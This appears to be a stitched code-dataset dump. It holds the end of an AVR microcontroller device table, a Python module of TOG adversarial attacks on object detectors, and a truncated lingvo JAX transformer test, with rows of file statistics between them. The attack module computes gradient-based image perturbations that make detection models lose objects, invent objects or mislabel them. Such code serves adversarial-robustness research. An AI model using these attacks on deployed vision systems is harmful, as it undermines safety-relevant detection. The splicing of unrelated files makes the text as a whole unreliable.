Device(devid="atmega640", name="ATmega640", signature=0x960803f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644", name="ATmega644", signature=0x960903f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644a", name="ATmega644A", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644p", name="ATmega644P", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644pa", name="ATmega644PA", signature=0x960a03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega644rfr2", name="ATmega644RFR2", signature=0xa60303f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645", name="ATmega645", signature=0x960503f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450", name="ATmega6450", signature=0x960603f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450a", name="ATmega6450A", signature=0x960e03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6450p", name="ATmega6450P", signature=0x960e03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645a", name="ATmega645A", signature=0x960d03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega645p", name="ATmega645P", signature=0x960d03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649", name="ATmega649", signature=0x960303f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490", name="ATmega6490", signature=0x960403f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490a", name="ATmega6490A", signature=0x960c03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega6490p", name="ATmega6490P", signature=0x960c03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649a", name="ATmega649A", signature=0x960b03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega649p", name="ATmega649P", signature=0x960b03f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64a", name="ATmega64A", signature=0x960203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x48),
Device(devid="atmega64c1", name="ATmega64C1", signature=0x9686, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64hve2", name="ATmega64HVE2", signature=0x9610, flash_size=0x10000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64m1", name="ATmega64M1", signature=0x9684, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega64rfr2", name="ATmega64RFR2", signature=0xa60203f, flash_size=0x10000, flash_pagesize=0x100, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88", name="ATmega88", signature=0x930a, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88a", name="ATmega88A", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88p", name="ATmega88P", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88pa", name="ATmega88PA", signature=0x930f, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega88pb", name="ATmega88PB", signature=0x9316, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega8hva", name="ATmega8HVA", signature=0x9310, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="atmega8u2", name="ATmega8U2", signature=0x9389, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny13", name="ATtiny13", signature=0x9007, flash_size=0x400, flash_pagesize=0x20, reg_dwdr=0x2e, reg_spmcsr=0x37),
Device(devid="attiny13a", name="ATtiny13A", signature=0x9007, flash_size=0x400, flash_pagesize=0x20, reg_dwdr=0x2e, reg_spmcsr=0x37),
Device(devid="attiny1634", name="ATtiny1634", signature=0x9412, flash_size=0x4000, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny167", name="ATtiny167", signature=0x9487, flash_size=0x4000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny2313", name="ATtiny2313", signature=0x910a, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny2313a", name="ATtiny2313A", signature=0x910a, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny24", name="ATtiny24", signature=0x910b, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny24a", name="ATtiny24A", signature=0x910b, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny25", name="ATtiny25", signature=0x9108, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny261", name="ATtiny261", signature=0x910c, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny261a", name="ATtiny261A", signature=0x910c, flash_size=0x800, flash_pagesize=0x20, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny4313", name="ATtiny4313", signature=0x920d, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny43u", name="ATtiny43U", signature=0x920c, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny44", name="ATtiny44", signature=0x9207, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny441", name="ATtiny441", signature=0x9215, flash_size=0x1000, flash_pagesize=0x10, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny44a", name="ATtiny44A", signature=0x9207, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny45", name="ATtiny45", signature=0x9206, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny461", name="ATtiny461", signature=0x9208, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny461a", name="ATtiny461A", signature=0x9208, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny48", name="ATtiny48", signature=0x9209, flash_size=0x1000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny828", name="ATtiny828", signature=0x9314, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny84", name="ATtiny84", signature=0x930c, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny841", name="ATtiny841", signature=0x9315, flash_size=0x2000, flash_pagesize=0x10, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny84a", name="ATtiny84A", signature=0x930c, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
Device(devid="attiny85", name="ATtiny85", signature=0x930b, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x22, reg_spmcsr=0x37),
Device(devid="attiny861", name="ATtiny861", signature=0x930d, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny861a", name="ATtiny861A", signature=0x930d, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=0x20, reg_spmcsr=0x37),
Device(devid="attiny87", name="ATtiny87", signature=0x9387, flash_size=0x2000, flash_pagesize=0x80, reg_dwdr=0x31, reg_spmcsr=0x37),
Device(devid="attiny88", name="ATtiny88", signature=0x9311, flash_size=0x2000, flash_pagesize=0x40, reg_dwdr=None, reg_spmcsr=0x37),
]
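# --- Hedged sketch (not part of the generated module) -----------------------
# A small helper showing how the devices table above is typically consumed;
# find_device is an assumption, not a function emitted by generatedevices.py.
def find_device(devid):
    """Return the Device whose devid matches, or None if the id is unknown."""
    return next((d for d in devices if d.devid == devid), None)
dev = find_device("attiny85")
if dev is not None:
    print(dev.name, hex(dev.signature), dev.flash_size)   # ATtiny85 0x930b 8192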
| 135.100629
| 153
| 0.781947
| 2,851
| 21,481
| 5.681165
| 0.103472
| 0.101192
| 0.11638
| 0.16892
| 0.70618
| 0.701488
| 0.701488
| 0.701488
| 0.693709
| 0.693709
| 0
| 0.17847
| 0.078441
| 21,481
| 158
| 154
| 135.955696
| 0.639725
| 0.001536
| 0
| 0
| 1
| 0
| 0.138487
| 0
| 0
| 0
| 0.156812
| 0
| 0
| 1
| 0.006452
| false
| 0
| 0
| 0
| 0.012903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8fa170fdfe52be30079acc73869283ac93c53386
| 2,444
|
py
|
Python
|
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | 1
|
2021-08-01T06:35:01.000Z
|
2021-08-01T06:35:01.000Z
|
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | null | null | null |
tog/attacks.py
|
thomastjk/advdouble
|
1dd16af48e6cc3bcf9f38e2ac4a5abc58a4b1758
|
[
"MIT"
] | null | null | null |
from attack_utils.target_utils import generate_attack_targets
import numpy as np
def tog_vanishing(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_vanishing_gradient(x_adv)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_fabrication(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_fabrication_gradient(x_adv)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_mislabeling(victim, x_query, target, n_iter=10, eps=8/255., eps_iter=2/255.):
detections_query = victim.detect(x_query, conf_threshold=victim.confidence_thresh_default)
detections_target = generate_attack_targets(detections_query, confidence_threshold=victim.confidence_thresh_default,
mode=target)
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_mislabeling_gradient(x_adv, detections=detections_target)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
def tog_untargeted(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.):
detections_query = victim.detect(x_query, conf_threshold=victim.confidence_thresh_default)
eta = np.random.uniform(-eps, eps, size=x_query.shape)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
for _ in range(n_iter):
grad = victim.compute_object_untargeted_gradient(x_adv, detections=detections_query)
signed_grad = np.sign(grad)
x_adv -= eps_iter * signed_grad
eta = np.clip(x_adv - x_query, -eps, eps)
x_adv = np.clip(x_query + eta, 0.0, 1.0)
return x_adv
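# --- Hedged usage sketch (not part of tog/attacks.py) ------------------------
# DummyVictim stands in for a real detector wrapper; the repository's actual
# victim objects define detect() and the compute_object_*_gradient() methods
# used by the attacks above.
class DummyVictim:
    confidence_thresh_default = 0.5
    def compute_object_vanishing_gradient(self, x):
        return np.zeros_like(x)     # a real model returns the loss gradient w.r.t. the input
    def detect(self, x, conf_threshold):
        return []                   # a real model returns its detections
victim = DummyVictim()
x_query = np.random.rand(1, 416, 416, 3)   # placeholder image batch scaled to [0, 1]
x_adv = tog_vanishing(victim, x_query, n_iter=10, eps=8/255., eps_iter=2/255.)
print(x_adv.shape, float(np.abs(x_adv - x_query).max()) <= 8/255. + 1e-9)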
| 44.436364
| 121
| 0.652209
| 395
| 2,444
| 3.75443
| 0.134177
| 0.064734
| 0.056642
| 0.053945
| 0.826703
| 0.757923
| 0.757923
| 0.757923
| 0.757923
| 0.757923
| 0
| 0.038339
| 0.231588
| 2,444
| 54
| 122
| 45.259259
| 0.751331
| 0
| 0
| 0.73913
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8fdaadbed269f800fcaeec79afadf5c05cdc9795
| 28,722
|
py
|
Python
|
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
Google/benchmarks/bert/implementations/bert-research-JAX-tpu-v4-2048/jax/layers/transformers_test.py
|
gglin001/training_results_v1.1
|
58fd4103f0f465bda6eb56a06a74b7bbccbbcf24
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lingvo Jax transformer layers."""
import itertools
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import numpy as jnp
from jax import test_util
from lingvo.core import batch_major_attention
from lingvo.jax import base_layer
from lingvo.jax import py_utils
from lingvo.jax import test_utils
from lingvo.jax.layers import attentions
from lingvo.jax.layers import transformers
import numpy as np
import tensorflow.compat.v2 as tf
class TransformersTest(test_util.JaxTestCase):
def setUp(self):
super().setUp()
np.random.seed(123456)
tf.random.set_seed(123)
@parameterized.parameters(*list(itertools.product([True, False], repeat=3)))
def test_transformer_layer(self, mask_self_attention, packed_input,
cross_attention):
p = transformers.TransformerLayer.Params().Set(
name='jax_transformer_layer',
input_dims=32,
hidden_dims=128,
num_heads=8,
mask_self_attention=mask_self_attention,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = transformer_layer.InstantiateVariables(prng_key)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.input_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
causal_mask = None
segment_mask = None
tf_segment_mask = None
attention_mask = attentions.ConvertPaddingsToMask(paddings)
if mask_self_attention:
causal_mask = attentions.CausalMask(inputs)
attention_mask = jnp.minimum(attention_mask, causal_mask)
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
attention_mask = jnp.minimum(attention_mask, segment_mask)
if mask_self_attention:
tf_segment_mask = batch_major_attention.CausalSegmentMask(
segment_ids, tf.float32)
else:
tf_segment_mask = batch_major_attention.SegmentMask(
segment_ids, segment_ids)
cross_inputs = None
cross_attention_mask = None
tf_cross_inputs = None
tf_cross_paddings = None
tf_cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 128)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.input_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
tf_cross_inputs = tf.constant(npy_cross_inputs, dtype=tf.float32)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
cross_attention_mask = attentions.ConvertPaddingsToMask(cross_paddings)
tf_cross_paddings = tf.constant(npy_cross_paddings, dtype=tf.float32)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
cross_attention_mask = jnp.minimum(cross_attention_mask,
cross_segment_mask)
tf_cross_segment_mask = batch_major_attention.SegmentMask(
segment_ids, source_segment_ids)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
outputs, _ = transformer_layer.FProp(
initial_vars,
inputs,
paddings,
attention_mask=attention_mask,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask)
logging.info('initial_vars in transformer layer = %s', initial_vars)
# Test whether tf Transformer layer returns same output
# Modify initial_vars to use TF compatible params
tf_initial_vars = test_utils.ReplaceJaxAttentionVarsToTf(
initial_vars, cross_attention)
tf_initial_vars = test_utils.ToTfNmap(tf_initial_vars)
logging.info('tf_initial_vars in transformer layer = %s', initial_vars)
tf_p = batch_major_attention.TransformerLayer.Params().Set(
name='tf_transformer_layer',
input_dim=p.input_dims,
num_heads=p.num_heads,
mask_self_atten=mask_self_attention,
packed_input=packed_input,
has_aux_atten=cross_attention)
tf_p.tr_fflayer_tpl.hidden_dim = p.hidden_dims
tf_p.tr_fflayer_tpl.fflayer_tpl.batch_norm = False
tf_p.tr_fflayer_tpl.fflayer_tpl.has_bias = True
tf_transformer_layer = tf_p.Instantiate()
tf_output, _ = tf_transformer_layer.FProp(
tf_initial_vars,
tf.constant(npy_inputs, dtype=tf.float32),
paddings=test_utils.ToTfNmap(npy_paddings),
segment_mask=tf_segment_mask,
aux_vec=tf_cross_inputs,
aux_paddings=tf_cross_paddings,
aux_segment_mask=test_utils.ToTfNmap(tf_cross_segment_mask))
np_outputs = test_utils.ToNp(outputs)
tf_np_outputs = test_utils.ToNp(tf_output)
self.assertAllClose(tf_np_outputs, np_outputs, atol=1e-5)
@parameterized.parameters((True, True), (False, True), (True, False),
(False, False))
def test_transformer_layer_extendstep(self, packed_input, cross_attention):
p = transformers.TransformerLayer.Params().Set(
name='jax_transformer_layer',
input_dims=8,
hidden_dims=32,
num_heads=4,
mask_self_attention=True,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = 5
batch_size = 4
transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = transformer_layer.InstantiateVariables(prng_key)
initial_states = transformer_layer.InitStates(initial_vars, batch_size,
seq_len)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.input_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
attention_mask = attentions.ConvertPaddingsToMask(paddings)
segment_mask = None
causal_mask = attentions.CausalMask(inputs)
attention_mask = jnp.minimum(causal_mask, attention_mask)
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
attention_mask = jnp.minimum(attention_mask, segment_mask)
cross_inputs = None
cross_paddings = None
cross_attention_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 32)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.input_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
cross_attention_mask = attentions.ConvertPaddingsToMask(cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
cross_attention_mask = jnp.minimum(cross_attention_mask,
cross_segment_mask)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
fprop_outputs, _ = transformer_layer.FProp(
initial_vars,
inputs,
paddings,
attention_mask=attention_mask,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask)
decoder_outputs = jnp.zeros(shape=[seq_len, batch_size, p.input_dims])
atten_states = initial_states
for t in range(seq_len):
attention_mask_t = attention_mask[:, :, t, :]
cross_attention_mask_t = cross_attention_mask
if cross_attention:
cross_attention_mask_t = cross_attention_mask[:, :, t, :]
cross_attention_mask_t = np.expand_dims(
cross_attention_mask_t, axis=2)
atten_states, encoded = transformer_layer.ExtendStep(
initial_vars,
atten_states,
inputs=inputs[:, t, :],
time_step=t,
attention_mask=attention_mask_t,
cross_inputs=cross_inputs,
cross_attention_mask=cross_attention_mask_t)
decoder_outputs = decoder_outputs.at[t].set(encoded)
decoder_out_transposed = jnp.transpose(decoder_outputs, [1, 0, 2])
logging.info('initial_vars in transformer layer = %s', initial_vars)
np_fprop_outputs = test_utils.ToNp(fprop_outputs)
np_decoder_outputs = test_utils.ToNp(decoder_out_transposed)
self.assertAllClose(np_fprop_outputs, np_decoder_outputs, atol=1e-5)
@parameterized.parameters((True, True, True), (True, False, True),
(True, True, False), (False, True, True),
(True, False, False), (False, True, False),
(False, False, True), (False, False, False))
def test_stacked_transformer_layer(self, mask_self_attention, packed_input,
cross_attention):
p = transformers.StackedTransformerLayers.Params().Set(
name='jax_stacked_transformer_layer',
model_dims=16,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
stacked_transformer_layer = p.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, p.model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
tf_segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
if mask_self_attention:
tf_segment_mask = batch_major_attention.CausalSegmentMask(
segment_ids, tf.float32)
else:
tf_segment_mask = batch_major_attention.SegmentMask(
segment_ids, segment_ids)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
tf_cross_inputs = None
tf_cross_paddings = None
tf_cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 64)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, p.model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
tf_cross_inputs = tf.constant(npy_cross_inputs, dtype=tf.float32)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
tf_cross_paddings = tf.constant(npy_cross_paddings, dtype=tf.float32)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
tf_cross_segment_mask = batch_major_attention.SegmentMask(
segment_ids, source_segment_ids)
with base_layer.JaxContext.NewContext(
prng_key=prng_key, global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
segment_mask=segment_mask,
cross_inputs=cross_inputs,
cross_paddings=cross_paddings,
cross_segment_mask=cross_segment_mask)
logging.info('initial_vars in transformer layer = %s', initial_vars)
# Test whether tf Transformer layer returns same output
# Modify initial_vars to use TF compatible params
tf_initial_vars = py_utils.NestedMap()
tf_initial_vars.x_layers = []
for jax_initial_vars in initial_vars.x_layers:
tf_layer_vars = test_utils.ReplaceJaxAttentionVarsToTf(
jax_initial_vars, cross_attention)
tf_initial_vars.x_layers.append(tf_layer_vars)
tf_initial_vars = test_utils.ToTfNmap(tf_initial_vars)
logging.info('tf_initial_vars in transformer layer = %s', initial_vars)
tf_p = batch_major_attention.StackedTransformerLayers.Params().Set(
name='tf_transformer_layer',
mdl_dim=p.model_dims,
hidden_dim=p.hidden_dims,
num_atten_heads=p.num_heads,
mask_self_atten=mask_self_attention,
num_layers=p.num_layers,
packed_input=packed_input,
has_aux_atten=cross_attention)
tf_p.transformer_layer_params_tpl.tr_fflayer_tpl.fflayer_tpl.batch_norm = (
False)
tf_p.transformer_layer_params_tpl.tr_fflayer_tpl.fflayer_tpl.has_bias = True
tf_stacked_transformer_layer = tf_p.Instantiate()
tf_output, _ = tf_stacked_transformer_layer.FProp(
tf_initial_vars,
test_utils.ToTfNmap(npy_inputs),
paddings=test_utils.ToTfNmap(npy_paddings),
segment_mask=test_utils.ToTfNmap(tf_segment_mask),
aux_vec=test_utils.ToTfNmap(tf_cross_inputs),
aux_paddings=test_utils.ToTfNmap(tf_cross_paddings),
aux_segment_mask=test_utils.ToTfNmap(tf_cross_segment_mask))
np_outputs = test_utils.ToNp(outputs)
tf_np_outputs = test_utils.ToNp(tf_output)
self.assertAllClose(tf_np_outputs, np_outputs, atol=1e-5)
@parameterized.parameters(*list(itertools.product([True, False], repeat=3)))
def test_repeated_stacked_xformer_layer(self, mask_self_attention,
packed_input, cross_attention):
model_dims = 16
p1 = transformers.StackedTransformerLayers.Params().Set(
name='jax_stacked_transformer_layer',
model_dims=model_dims,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
p2 = transformers.StackedTransformerLayersRepeated.Params().Set(
name='jax_stacked_transformer_layer_repeated',
model_dims=model_dims,
hidden_dims=64,
num_heads=8,
mask_self_attention=mask_self_attention,
num_layers=4,
packed_input=packed_input,
cross_attention=cross_attention)
seq_len = np.random.randint(10, 32)
batch_size = 10
stacked_transformer_layer = p1.Instantiate()
repeated_transformer_layer = p2.Instantiate()
prng_key = jax.random.PRNGKey(seed=123)
initial_vars = stacked_transformer_layer.InstantiateVariables(prng_key)
repeated_transformer_layer.InstantiateVariableConfigs()
def _StackVars(*args):
args = [x[jnp.newaxis, :] for x in args]
return jnp.vstack(args)
stacked_vars = py_utils.NestedMap(
repeat=py_utils.NestedMap(
sub=tf.nest.map_structure(_StackVars, *initial_vars.x_layers)))
npy_inputs = np.random.normal(
1.0, 0.5, [batch_size, seq_len, model_dims]).astype('float32')
inputs = jnp.asarray(npy_inputs)
npy_paddings = np.random.randint(0, 1,
[batch_size, seq_len]).astype('float32')
paddings = jnp.asarray(npy_paddings)
segment_mask = None
if packed_input:
segment_ids = np.random.random_integers(0, 2, [batch_size, seq_len])
segment_mask = attentions.SegmentMask(segment_ids, dtype=np.float32)
cross_inputs = None
cross_paddings = None
cross_segment_mask = None
if cross_attention:
cross_seq_len = np.random.randint(10, 64)
npy_cross_inputs = np.random.normal(
1.0, 0.5, [batch_size, cross_seq_len, model_dims]).astype('float32')
cross_inputs = jnp.asarray(npy_cross_inputs)
npy_cross_paddings = np.random.randint(
0, 1, [batch_size, cross_seq_len]).astype('float32')
cross_paddings = jnp.asarray(npy_cross_paddings)
if packed_input:
source_segment_ids = np.random.random_integers(
0, 2, [batch_size, cross_seq_len])
cross_segment_mask = attentions.SegmentMask(
segment_ids, source_segment_ids, dtype=np.float32)
with base_layer.JaxContext.NewContext(
prng_key=jax.random.PRNGKey(seed=1234),
global_step=jnp.array(0, dtype=jnp.uint32)):
outputs = stacked_transformer_layer.FProp(
initial_vars,
inputs,
paddings,
